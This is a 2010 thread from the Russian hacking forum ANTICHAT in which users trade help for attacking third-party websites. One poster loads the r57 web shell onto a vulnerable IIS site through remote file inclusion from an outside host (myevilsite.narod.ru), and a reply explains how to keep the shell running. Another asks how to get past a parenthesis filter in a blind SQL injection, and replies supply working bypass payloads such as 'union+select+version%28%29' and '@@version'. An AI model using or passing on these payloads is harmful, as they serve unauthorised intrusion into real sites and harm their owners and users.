ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

26.07.2010, 16:59
|
|
Guest
Сообщений: n/a
Провел на форуме: 6647
Репутация:
0
|
|
потверждение по мыло не нужно! сразу авторизует
ну я не знаю может запрос бд какойнить сделать . подскажите а!
|
|
|
|

26.07.2010, 23:03
|
|
Новичок
Регистрация: 03.06.2010
Сообщений: 0
Провел на форуме: 648
Репутация:
0
|
|
Здравствуйте!Подскажите, пожалуйста!
Ситуация:
Имеется инклудовый сайт, захожу на него шеллом так-
site.ru/index.php?page=http://myevilsite.narod.ru/shell.php
Открывается полноценное окно шелла.Но, как только пробую выполнить команду или скачать файл, вылетает из шелла обратно на страницу уже без шелла.
Пробовал и r57shell 1.24 и другие, одинаково.
Может быть сможете что-нибудь посоветовать.
Windows NT VIA-008 5.2 build 3790
Microsoft-IIS/6.0
Заранее большое спасибо!!!
|
|
|

26.07.2010, 23:27
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме: 2459557
Репутация:
606
|
|
Сообщение от against
against said:
Здравствуйте!Подскажите, пожалуйста!
Ситуация:
Имеется инклудовый сайт, захожу на него шеллом так-
site.ru/index.php?page=http://myevilsite.narod.ru/shell.php
Открывается полноценное окно шелла.Но, как только пробую выполнить команду или скачать файл, вылетает из шелла обратно на страницу уже без шелла.
Пробовал и r57shell 1.24 и другие, одинаково.
Может быть сможете что-нибудь посоветовать.
Windows NT VIA-008 5.2 build 3790
Microsoft-IIS/6.0
Заранее большое спасибо!!!
Сделай так, чтоб параметр page=http://myevilsite.narod.ru/shell.php оставался в адресной строке.
|
|
|

27.07.2010, 02:16
|
|
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме: 247684
Репутация:
136
|
|
моё мнение что нормальльный хостинг-провайдер....при загрузки в ftp.....будет банить шеллы....только ойда ушёл(у меня такая бня была ужо много раз).....
|
|
|

27.07.2010, 13:07
|
|
Познающий
Регистрация: 17.04.2009
Сообщений: 59
Провел на форуме: 401944
Репутация:
37
|
|
Нашел скулю, но там фильтруются скобки, как можно обойти данную фильтрацию? Она + еще ко всему Blind, а в Blind, насколько я знаю, без скобок никак не обойтись
|
|
|

27.07.2010, 13:10
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме: 4072944
Репутация:
1550
|
|
Сообщение от ZARO
ZARO said:
Нашел скулю, но там
фильтруются скобки
, как можно обойти данную фильтрацию? Она + еще ко всему Blind, а в Blind, насколько я знаю, без скобок никак не обойтись
0x28, 0x29
|
|
|

27.07.2010, 22:00
|
|
Познающий
Регистрация: 17.04.2009
Сообщений: 59
Провел на форуме: 401944
Репутация:
37
|
|
Сообщение от Gorev
Gorev said:
0x28, 0x29
Не получается! Т.к. если выполнить функцию 0x76657273696F6E2829 (version()) она не будет робит. Сервак приймет это за простую строку и выведет!
|
|
|

27.07.2010, 22:10
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме: 4072944
Репутация:
1550
|
|
Сообщение от ZARO
ZARO said:
Не получается! Т.к. если выполнить функцию 0x76657273696F6E2829 (version()) она не будет робит. Сервак приймет это за простую строку и выведет!
union+select+version%28%29
|
|
|

27.07.2010, 22:17
|
|
Познающий
Регистрация: 17.04.2009
Сообщений: 59
Провел на форуме: 401944
Репутация:
37
|
|
Сообщение от Gorev
Gorev said:
union+select+version%28%29
Я это тоже пробовал, после отправки %28%29 заменяется на () и снова выдает ошибку...
|
|
|

27.07.2010, 23:36
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
Сообщение от ZARO
ZARO said:
Я это тоже пробовал, после отправки %28%29 заменяется на () и снова выдает ошибку...
@@version
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|